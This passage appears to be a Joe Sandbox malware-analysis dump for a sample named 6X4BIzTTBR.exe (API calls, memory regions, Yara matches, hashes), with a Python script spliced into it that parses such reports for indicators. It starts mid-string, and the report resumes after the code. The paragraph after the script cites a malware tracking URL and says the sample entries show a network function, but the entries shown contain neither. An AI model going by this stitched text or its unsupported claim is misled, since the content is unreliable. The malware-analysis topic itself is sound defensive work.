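  • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• String ID:
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
APIs
• _free.LIBCMT ref: 0470A0D4
  • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
Memory Dump Source
• Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
Yara matches
• String ID:
• Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
APIs
• GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6X4BIzTTBR.exe,00000104), ref: 0042F763
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• String ID: C:\Users\user\Desktop\6X4BIzTTBR.exe
• Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
"""

API_RE = re.compile(  # "Name.LIB(args), ref: ADDR" or "Name.LIB ref: ADDR", optionally a subcall
    r"^(?P<sub>Part of subcall function [0-9A-F]{8}: )?(?P<name>\S+?)\.(?P<lib>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-F]{8})$")
SRC_RE = re.compile(r"^Source File: \S+, Offset: (?P<offset>[0-9A-F]{8}), based on PE: (?P<pe>true|false)$")
URL_RE = re.compile(r"https?://[^\s$\"']+")
PATH_RE = re.compile(r"[A-Za-z]:\\[^\s,)]+")
NET_LIBS = {"WININET", "WINHTTP", "WS2_32"}  # assumption: DLL suffixes that mean network I/O

def parse_entries(text):
    """One dict per 'APIs' block: calls, dump region, Yara flag, strings, Opcode ID."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every block opens with this heading
            cur = {"apis": [], "strings": [], "yara": False, "offset": None,
                   "pe_backed": None, "opcode_id": None}
            entries.append(cur)
        elif cur is None or not line:
            continue
        elif line == "Yara matches":  # heading is only rendered when the region matched a rule
            cur["yara"] = True
        elif m := API_RE.match(line.removeprefix("• ")):
            cur["apis"].append({"name": m["name"], "lib": m["lib"], "ref": m["ref"],
                                "subcall": bool(m["sub"]),
                                "args": m["args"].split(",") if m["args"] else []})
        elif m := SRC_RE.match(line.removeprefix("• ")):
            cur["offset"], cur["pe_backed"] = m["offset"], m["pe"] == "true"
        elif line.startswith("• String ID:"):  # several strings are joined with '$'
            cur["strings"] = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• Opcode ID:"):
            cur["opcode_id"] = line.split(":", 1)[1].strip()
    return entries

def extract_iocs(entries):
    """URLs and file paths from String ID fields and API arguments, deduplicated."""
    urls, paths = set(), set()
    for e in entries:
        for text in e["strings"] + [a for c in e["apis"] for a in c["args"]]:
            urls.update(URL_RE.findall(text))
            paths.update(PATH_RE.findall(text))
    return sorted(urls), sorted(paths)

def network_functions(entries):
    """Functions calling a networking DLL directly, with the region they live in."""
    return [{"offset": e["offset"], "pe_backed": e["pe_backed"], "yara": e["yara"],
             "strings": e["strings"], "apis": net}
            for e in entries
            if (net := [c["name"] for c in e["apis"] if c["lib"] in NET_LIBS and not c["subcall"]])]

def shared_functions(entries):
    """Opcode IDs seen both in a PE-backed region and in one not backed by a PE."""
    seen = defaultdict(set)
    for e in entries:
        if e["opcode_id"] and e["offset"]:
            seen[e["opcode_id"]].add((e["offset"], e["pe_backed"]))
    return {oid: sorted(locs) for oid, locs in seen.items()
            if {pe for _, pe in locs} == {True, False}}

if __name__ == "__main__":
    ents = parse_entries(SAMPLE)
    print("IOCs:", extract_iocs(ents))
    print("network functions:", network_functions(ents))
    print("same code in both regions:", shared_functions(ents))
```

On these four entries the only network function is the one at 046D0000, the region that is not PE-backed and carries the Yara match, and its strings are the tracking URL https://post-to-me.com/track_prt.php?sub= with the &cc=DE suffix; that region is where to carve when extracting the unpacked payload. Scraping the rendered report is a convenience for reading; Joe Sandbox also offers structured JSON/XML report downloads, which a pipeline should use instead of the HTML.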
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6X4BIzTTBR.exe,00000104), ref: 0042F763
                                                      • _free.LIBCMT ref: 0042F82E
                                                      • _free.LIBCMT ref: 0042F838
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                      • API String ID: 2506810119-1363307703
                                                      • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction ID: dbcffc3f1a2e037b3231e9922d1002feded09478037b822c8be7cdb08c61cc45
                                                      • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                      • Instruction Fuzzy Hash: 2431A371B00228ABDB21DF95AC8099FBBFCEF95314B90407BE80597211D7749A44CB54
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\6X4BIzTTBR.exe,00000104), ref: 046FF9CA
                                                      • _free.LIBCMT ref: 046FFA95
                                                      • _free.LIBCMT ref: 046FFA9F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$FileModuleName
                                                      • String ID: C:\Users\user\Desktop\6X4BIzTTBR.exe
                                                      • API String ID: 2506810119-1363307703
                                                      • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction ID: d528c0b564dbcb7d3ed08e129a3793b5758ea83edaa5c0908ff5a697a428bc89
                                                      • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                      • Instruction Fuzzy Hash: C431B071A00218EFDB25DF99DCC4D9EBBFCEF99314B10406BEA4497310E670AA45CB64
                                                      APIs
                                                      • Concurrency::details::SchedulerBase::GetRealizedChore.LIBCONCRT ref: 046F3061
                                                        • Part of subcall function 046E8AC2: RtlInterlockedPopEntrySList.NTDLL(?), ref: 046E8ACD
                                                      • SafeSQueue.LIBCONCRT ref: 046F307A
                                                      • Concurrency::location::_Assign.LIBCMT ref: 046F313A
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046F315B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046F3169
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AssignBase::ChoreConcurrency::details::Concurrency::location::_EntryException@8InterlockedListQueueRealizedSafeSchedulerThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 3496964030-1946750398
                                                      • Opcode ID: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                      • Instruction ID: 40788c513f388a0ac08fbb6480e35033df1730f0686e728c1aef0da53b149984
                                                      • Opcode Fuzzy Hash: f5b94dce39a4837ba2e296382e939281c1cc6f51ac582c5d2e9b37c10b4daf25
                                                      • Instruction Fuzzy Hash: F821B0357002015FDF16EF69C890AB97BA1AF95314F188199DE868B352EB70E845CB91
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,047021D4), ref: 046FE210
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,047021D4), ref: 046FE24A
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 046FE251
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                      • String ID: "1@
                                                      • API String ID: 1079102050-1946750398
                                                      • Opcode ID: 4fd1495440eadd5c3dc41de9799f65349cf24b26b2a276bdd817443b8209e2bc
                                                      • Instruction ID: 06cde5c5606b118816e697f4613344175970c1ea6c10efed7cccba3a1525cded
                                                      • Opcode Fuzzy Hash: 4fd1495440eadd5c3dc41de9799f65349cf24b26b2a276bdd817443b8209e2bc
                                                      • Instruction Fuzzy Hash: 48112770640305EAFB14BBB0DC0DB6D3BA5AF15708F140468FB446B3E1FB66B540C665
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,047021D4), ref: 046FE210
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,047021D4), ref: 046FE24A
                                                      • RtlExitUserThread.NTDLL(00000000), ref: 046FE251
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThreadUser
                                                      • String ID: "1@
                                                      • API String ID: 1079102050-1946750398
                                                      • Opcode ID: 772db29aeb0659f64b8386b2f2c5c587abdd219a8ee761fd2048cc7d888d034b
                                                      • Instruction ID: f49cfe8e46b28699b13098c97cda0cf3e74b67d1372ea8309718dbc7a6e64405
                                                      • Opcode Fuzzy Hash: 772db29aeb0659f64b8386b2f2c5c587abdd219a8ee761fd2048cc7d888d034b
                                                      • Instruction Fuzzy Hash: 8E110670640304EAFB04ABB0DC0EB6D3BA5AF15709F100468FB446B3E1FBA67540D665
                                                      APIs
                                                      • SetLastError.KERNEL32(0000000D,?,0040DE57,0040C66F,?,?,00000000,?,0040C53F,0045D5E4,0040C50C,0045D5DC,?,ios_base::failbit set,0040C66F), ref: 0040EFC0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID: "1@$W(@
                                                      • API String ID: 1452528299-1069126892
                                                      • Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction ID: f111cc905f82c8a928de70632128f76a031041254e8db0217e66cfc8f3eabaa4
                                                      • Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
                                                      • Instruction Fuzzy Hash: 9511CE36200227BFCF125F61DC445AAFB65BB48759B11443AFA46E63A0CA70D8209BE5
                                                      APIs
                                                      • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 00425F1D
                                                        • Part of subcall function 00424EEA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F07
                                                        • Part of subcall function 00424EEA: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 00424F1C
                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 00425F50
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00425F7B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                      • String ID: "1@
                                                      • API String ID: 2684344702-1946750398
                                                      • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction ID: faecedbbada0843c4fc82a0c4a58740f890c3ea4f79c63798c37a111b6c67800
                                                      • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction Fuzzy Hash: 0301C439701629ABCB01DF64D5808AE77A9EF89354B61006AEC05EB301DA34EE06DB64
                                                      APIs
                                                      • Concurrency::details::SchedulingRing::GetPseudoRRNonAffineScheduleGroupSegment.LIBCMT ref: 046F6184
                                                        • Part of subcall function 046F5151: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 046F516E
                                                        • Part of subcall function 046F5151: Concurrency::details::SchedulingRing::FindScheduleGroupSegment.LIBCMT ref: 046F5183
                                                      • Concurrency::details::SchedulingRing::GetNextScheduleGroupSegment.LIBCMT ref: 046F61B7
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 046F61E2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$GroupRing::ScheduleSchedulingSegment$FindWork$AffineItemItem::NextPseudo
                                                      • String ID: "1@
                                                      • API String ID: 2684344702-1946750398
                                                      • Opcode ID: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction ID: 7046a0da292cda890b59a6cadb4186f454816d5dd1c4849e548e2a2e6927407e
                                                      • Opcode Fuzzy Hash: 32a001647ef642d3bdab98332db3e62f94cdd661e171078b1986cfd9e8451c46
                                                      • Instruction Fuzzy Hash: 3E019635A00219ABCF15DF58C9809AE77BAEF89254B100079DD46EB341EA30FE0697A0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ListSafe
                                                      • String ID: @B
                                                      • API String ID: 436756528-2358967077
                                                      • Opcode ID: 7da9a168687d1e4da8fb5bbf0fa12b87a06665a60ff754e8973e0564e5603328
                                                      • Instruction ID: 4a03b2e6d99db2648f2ac2d3de1fb1a4e8af5e44ea9ab4442d33b45dacd039eb
                                                      • Opcode Fuzzy Hash: 7da9a168687d1e4da8fb5bbf0fa12b87a06665a60ff754e8973e0564e5603328
                                                      • Instruction Fuzzy Hash: 1901C47120160AEBC704DF51C880BA6F7F9FF61318F50816AD5454B951FB71F59ACB90
                                                      APIs
                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00411B52
                                                        • Part of subcall function 00410A61: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00410A74
                                                        • Part of subcall function 00410A61: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00410A7E
                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00411B6B
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411BB1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                      • String ID: "1@
                                                      • API String ID: 2524916244-1946750398
                                                      • Opcode ID: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction ID: 7ebbd5f4117c6780c4894fdb4466b61b7024d18f635e42f8442c1a99ecd00026
                                                      • Opcode Fuzzy Hash: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction Fuzzy Hash: 9701D235A042218BDF25AB50C8407EDB372AF94711F58006BDA026B365EBBCBD81CB99
                                                      APIs
                                                      • Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 046E1DB9
                                                        • Part of subcall function 046E0CC8: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 046E0CDB
                                                        • Part of subcall function 046E0CC8: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 046E0CE5
                                                      • Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 046E1DD2
                                                      • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 046E1E18
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::Concurrency::details::_LockLock::_Node::QueueScoped_lock$Acquire_lockConcurrency::critical_section::_EventNodeReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter
                                                      • String ID: "1@
                                                      • API String ID: 2524916244-1946750398
                                                      • Opcode ID: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction ID: 775f42c26c619beeff5ce6216e84e33a6e46acdf004fad194dbddab6728565d2
                                                      • Opcode Fuzzy Hash: e87f860760146753fe082dcecfc53618bed33832f9ef1d6300d7ed55f1413025
                                                      • Instruction Fuzzy Hash: A801C075A022208BEB15AF62C8A07FDB3F2BF86714F184459D8016B344FF74B905DB91
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041DA63
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041DA71
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: "1@$pContext
                                                      • API String ID: 1687795959-994062807
                                                      • Opcode ID: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction ID: e9e05c554e934b5f60187f9222a47d7b2d4c25e7b32de392b4464fcfd65fd5fc
                                                      • Opcode Fuzzy Hash: b2b82f4ab1e1eb8f3cfb2c3a53c14f3a8e7351539c320be7adb159790f5600bc
                                                      • Instruction Fuzzy Hash: 44F05939B005159BCB04EB59DC85C5EF7A8AF85761310007BF902E3341DBB8ED05CA98
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,004496AC,00000000,?,?,?,0470010C,00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002), ref: 0470017B
                                                      • GetProcAddress.KERNEL32(00000000,004496C4), ref: 0470018E
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0470010C,00000000,?,047000AC,00000000,00457970,0000000C,04700203,00000000,00000002), ref: 047001B1
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: "1@
                                                      • API String ID: 4061214504-1946750398
                                                      • Opcode ID: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                      • Instruction ID: 92245f8c12ae7d0554511226ef0fc0f08c27f307edf5ba27b3722f30a955d746
                                                      • Opcode Fuzzy Hash: ec107a19a1f6916f8ddc3040fc448cd7ce5ab95be265ea966da4c8f834c9d8ef
                                                      • Instruction Fuzzy Hash: 82F0C834A00208FFDB109F50DC09BAEBFF4EF05B12F100064F805A2290CB745A50CA48
                                                      APIs
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046DC8F4
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8Throw
                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                      • API String ID: 2005118841-1866435925
                                                      • Opcode ID: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction ID: b41bf647f2405ce2234b446c080158b1111a8a7299f00e61669dba068dda1261
                                                      • Opcode Fuzzy Hash: 019f52a8e0bb9ff9f48767ebbe9764e79a713ad81fd208e44c7c6c06e0bc9c3a
                                                      • Instruction Fuzzy Hash: CFF02BB3D0030C6EEB04E954CD01FFA37985B11344F04807BEE51AB182FB69B905C799
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F6D), ref: 0042DFA9
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: W(@
                                                      • API String ID: 3213686812-3174239773
                                                      • Opcode ID: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                      • Instruction ID: 943ce1444c0a3fdd2f9a13aeee38a04e77222ecd9776ae0e8bd594c126216534
                                                      • Opcode Fuzzy Hash: 66e0b01c820f3c016cb479e2b3e6a53e6d0229a994ecfa947a89fafbf06fb01a
                                                      • Instruction Fuzzy Hash: A7F02771B8431676FA203B717E0BBAB19244FA4B4DFD6003FBE09981C3DEAC9550802D
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_catchmake_shared
                                                      • String ID: MOC$RCC
                                                      • API String ID: 3472968176-2084237596
                                                      • Opcode ID: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction ID: 5307c51751886bb2e7506d4f71e1bedda4ce6820bf49d619d129ff1db6821184
                                                      • Opcode Fuzzy Hash: cd16dfaeb4beeb06cf1950504df26367b7e370f205a3e390df572c182ad6d8a4
                                                      • Instruction Fuzzy Hash: 96F06271504169CFEB11EF69C81466C7B61EF01B08F4580A6E6C05BB30EB787981CFE5
                                                      APIs
                                                      • IsProcessorFeaturePresent.KERNEL32(00000017,00431F6D), ref: 0042DFA9
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitFeatureLastPresentProcessorThread
                                                      • String ID: W(@
                                                      • API String ID: 3213686812-3174239773
                                                      • Opcode ID: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                      • Instruction ID: 0d7acbed5b354a9a99be5c59b99db76799250d6145fb54ff56176fa68b7c8b6f
                                                      • Opcode Fuzzy Hash: 7b487a85bde145f5f6618f4d2cac6f1d463b179069c0564edcd31255594901e1
                                                      • Instruction Fuzzy Hash: 97F055B0B8431536FA203BA17E0BBA61A244F94B0DF96003FBF09581C3DEAC8590402D
                                                      APIs
                                                      • Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 00424309
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042431B
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00424329
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler
                                                      • API String ID: 1381464787-923244539
                                                      • Opcode ID: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                      • Instruction ID: 4e749c8b64488bc28458a9bfad9a8a7976c370e0cc6eb5d3994e507a76605f43
                                                      • Opcode Fuzzy Hash: 27a4b28832b8d2c4d1e169b8d68e757cb4f39c4e60a74ca0ff363d542ca72071
                                                      • Instruction Fuzzy Hash: F2F0A731B012246BCB18FB55F852DDE73A99E403057E0816FB84663582DFBCAE49C65D
                                                      APIs
                                                      • Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 046EE8B6
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 046EE8C9
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046EE8D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: "1@
                                                      • API String ID: 1990795212-1946750398
                                                      • Opcode ID: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction ID: 9ec9cc4c5322bb62e30243e00febd6b699dc692708351fccccb5f6337f2d5dd1
                                                      • Opcode Fuzzy Hash: 94c991bbb4e237fce74e38a70429fd430151592173fe111bbf2d82945a6f33d3
                                                      • Instruction Fuzzy Hash: 79E0D836B0010867CB04FB69DC45C6EBBB9AED0A54754016AE911A7385EFB4BA09C6D8
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DCA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DD8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler$version
                                                      • API String ID: 1687795959-3154422776
                                                      • Opcode ID: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
                                                      • Instruction ID: d65273e1e78fe5f6c4f9effa117e15e32862206d66943a84ef09515c8d475caf
                                                      • Opcode Fuzzy Hash: 464dda17272c5f92190f115bd46177522cd506029ea0a62d1c7ec35c5c4aaa01
